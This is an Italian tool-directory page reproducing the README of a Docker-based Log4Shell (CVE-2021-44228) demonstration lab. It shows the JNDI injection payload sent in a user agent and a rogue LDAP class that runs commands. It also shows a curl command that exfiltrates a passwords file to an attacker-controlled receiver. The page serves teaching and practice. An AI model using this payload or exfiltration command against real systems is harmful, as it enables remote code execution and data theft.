Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/dicanio/cve-2021-44228-docker-example
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiApprendimento e FormazioneLab e Pratica
GitHubdicanio/cve-2021-44228-docker-example

CVE-2021-44228-docker-example

Dimostrazione basata su Docker dello sfruttamento di CVE-2021-44228 (Log4Shell), con un server Java vulnerabile, un server LDAP dannoso ed esfiltrazione di dati verso un ricevitore controllato dall'attaccante.

Vedi Repository
144 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44228-docker-example

Una semplice dimostrazione di CVE-2021-44228 per trasferire dati da un server vulnerabile a un servizio web controllato da un attaccante. Tutti i componenti coinvolti sono eseguiti tramite Docker.

Componenti

vulnerable-server

Questo è un server Java standard che funge da vittima. Esegue:

  • Java 8u111
  • Web Application (Spring Boot 2.6.1)
  • Log4J

Questo server è VULNERABILE con questa configurazione.

Informazioni aggiuntive:

  • l'endpoint /logging (GET) registra lo user agent usando Log4J
  • /foo/passwords.txt esiste (il bersaglio dell'attaccante)

Contenuto di passwords.txt:

root@kitploit:~
my secret

malicious-receiver

Questo è un server Java standard che funge da raccoglitore di dati dell'attaccante. Esegue:

  • Java 17
  • Web Application (Spring Boot 2.6.1)

Informazioni aggiuntive:

  • l'endpoint receiver (POST) registra il corpo della richiesta

malicious-ldap

Questo è un server LDAP basato su rogue-jndi. La sua classe ExportJava è stata modificata in modo che i comandi passati tramite il flag -c vengano eseguiti.

root@kitploit:~
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}

Quando richiesto dal server vulnerabile, risponderà con una classe che esegue il seguente comando quando viene istanziata:

root@kitploit:~
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt

Questo invierà effettivamente il contenuto di /foo/passwords.txt all'endpoint predisposto del ricevitore malintenzionato.

Utilizzo

  1. prepara le immagini Docker eseguendo:
    root@kitploit:~
    ./build.sh
    
  2. avvia i container dei componenti eseguendo:
    root@kitploit:~
    ./start.sh
    
  3. attiva la vulnerabilità eseguendo:
    root@kitploit:~
    curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
    
  4. controlla l'output di logging del componente malicious-receiver eseguendo:
    root@kitploit:~
    docker logs --timestamps docker_malicious-receiver_1
    
    Nel log dovrebbe essere presente il contenuto del file passwords.txt del server.
  5. ferma i container dei componenti eseguendo:
    root@kitploit:~
    ./stop.sh
    
Scarica lo strumento